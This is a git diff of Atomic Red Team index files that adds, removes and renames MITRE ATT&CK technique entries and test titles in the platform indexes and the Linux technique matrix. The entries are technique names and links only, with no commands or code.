-- T1531 Account Access Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-
 # collection
 - T1213.002 Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1114 Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1119 Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1530 Data from Cloud Storage Object [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1114.003 Email Collection: Email Forwarding Rule](../../T1114.003/T1114.003.md)
   - Atomic Test #1: Office365 - Email Forwarding [office-365]
 - [T1114.002 Email Collection: Remote Email Collection](../../T1114.002/T1114.002.md)
   - Atomic Test #1: Office365 - Remote Mail Collected [office-365]
 - T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1213.005 Messaging Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 
 # defense-evasion
 - T1564.008 Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -55,6 +46,7 @@
 - [T1562.008 Impair Defenses: Disable Cloud Logs](../../T1562.008/T1562.008.md)
   - Atomic Test #3: Office 365 - Exchange Audit Log Disabled [office-365]
   - Atomic Test #9: Office 365 - Set Audit Bypass For a Mailbox [office-365]
+- T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.004 Valid Accounts: Cloud Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -65,6 +57,7 @@
 - T1087.003 Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1087.004 Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1201 Password Policy Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1526 Cloud Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1538 Cloud Service Dashboard [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 
@@ -82,7 +75,6 @@
 - T1199 Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1566 Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1566.004 Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.004 Valid Accounts: Cloud Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 
 # persistence
@@ -130,3 +122,7 @@
 - T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1648 Serverless Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 
+# impact
+- T1657 Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1531 Account Access Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index e5dec58be3..7be4e1b9b5 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -184,6 +184,7 @@
   - Atomic Test #10: Event Log Manipulations- Time slipping via Powershell [windows]
 - [T1620 Reflective Code Loading](../../T1620/T1620.md)
   - Atomic Test #1: WinPwn - Reflectively load Mimik@tz into memory [windows]
+- T1480.002 Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1564.011 Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1218.003 Signed Binary Proxy Execution: CMSTP](../../T1218.003/T1218.003.md)
@@ -481,6 +482,7 @@
   - Atomic Test #1: Register Portable Virtualbox [windows]
   - Atomic Test #2: Create and start VirtualBox virtual machine [windows]
   - Atomic Test #3: Create and start Hyper-V virtual machine [windows]
+- T1027.014 Polymorphic Code [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1134.005 Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md)
   - Atomic Test #1: Injection SID-History with mimikatz [windows]
 - T1553 Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -527,7 +529,10 @@
   - Atomic Test #1: Hidden Window [windows]
   - Atomic Test #2: Headless Browser Accessing Mockbin [windows]
   - Atomic Test #3: Hidden Window-Conhost Execution [windows]
+- T1127.002 ClickOnce [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1070.010 Relocate Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1070.009 Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1027.006 HTML Smuggling](../../T1027.006/T1027.006.md)
   - Atomic Test #1: HTML Smuggling Remote Payload [windows]
@@ -680,6 +685,7 @@
   - Atomic Test #3: Phantom Dll Hijacking - ualapi.dll [windows]
 - T1574.014 AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.007 Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1055.003 Thread Execution Hijacking](../../T1055.003/T1055.003.md)
   - Atomic Test #1: Thread Execution Hijacking [windows]
 - [T1546.011 Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md)
@@ -961,6 +967,7 @@
   - Atomic Test #3: Cobalt Strike SSH (postex_ssh) pipe [windows]
   - Atomic Test #4: Cobalt Strike post-exploitation pipe (4.2 and later) [windows]
   - Atomic Test #5: Cobalt Strike post-exploitation pipe (before 4.2) [windows]
+- T1059.011 Lua [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1059.006 Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1569 System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1061,6 +1068,7 @@
   - Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
   - Atomic Test #5: Google Chrome Load Unpacked Extension With Command Line [windows]
 - T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.007 Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.011 Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md)
   - Atomic Test #1: Application Shim Installation [windows]
   - Atomic Test #2: New shim database files created in the default shim database directory [windows]
@@ -1242,6 +1250,7 @@
   - Atomic Test #2: DNS Regular Beaconing [windows]
   - Atomic Test #3: DNS Long Domain Query [windows]
   - Atomic Test #4: DNS C2 [windows]
+- T1071.005 Publish/Subscribe Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1568.001 Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1071 Application Layer Protocol](../../T1071/T1071.md)
@@ -1293,7 +1302,7 @@
   - Atomic Test #1: ICMP C2 [windows]
   - Atomic Test #2: Netcat C2 [windows]
   - Atomic Test #3: Powercat C2 [windows]
-- T1001.003 Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1001.003 Protocol or Service Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1090.004 Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1132 Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1132.002 Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1898,10 +1907,12 @@
 - T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1491 Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1496.002 Bandwidth Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1657 Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1491.001 Defacement: Internal Defacement](../../T1491.001/T1491.001.md)
   - Atomic Test #1: Replace Desktop Wallpaper [windows]
   - Atomic Test #2: Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message [windows]
+- T1496.001 Compute Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1565 Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1531 Account Access Removal](../../T1531/T1531.md)
   - Atomic Test #1: Change User Password - Windows [windows]
diff --git a/atomics/Indexes/Matrices/linux-matrix.md b/atomics/Indexes/Matrices/linux-matrix.md
index 041c8286b1..c60d9e23e7 100644
--- a/atomics/Indexes/Matrices/linux-matrix.md
+++ b/atomics/Indexes/Matrices/linux-matrix.md
@@ -2,47 +2,49 @@
 | initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
 |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
 | External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | Remote Services:VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [System Network Configuration Discovery: Internet Connection Discovery](../../T1016.001/T1016.001.md) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Screen Capture](../../T1113/T1113.md) | Exfiltration Over Webhook [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Phishing: Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Services: SSH](../../T1021.004/T1021.004.md) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Phishing: Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | File/Path Exclusions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Password Guessing](../../T1110.001/T1110.001.md) | Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Discovery: Domain Account](../../T1087.002/T1087.002.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Audio Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Service Stop](../../T1489/T1489.md) |
-| Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Rootkit](../../T1014/T1014.md) | [OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md) | [System Service Discovery](../../T1007/T1007.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | Server Software Component: Transport Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | [Network Share Discovery](../../T1135/T1135.md) |  | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Protocol Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Information Discovery](../../T1082/T1082.md) |  | [Data from Local System](../../T1005/T1005.md) | Exfiltration Over Web Service: Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Python](../../T1059.006/T1059.006.md) | Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials](../../T1552/T1552.md) | System Network Configuration Discovery: Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement: Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
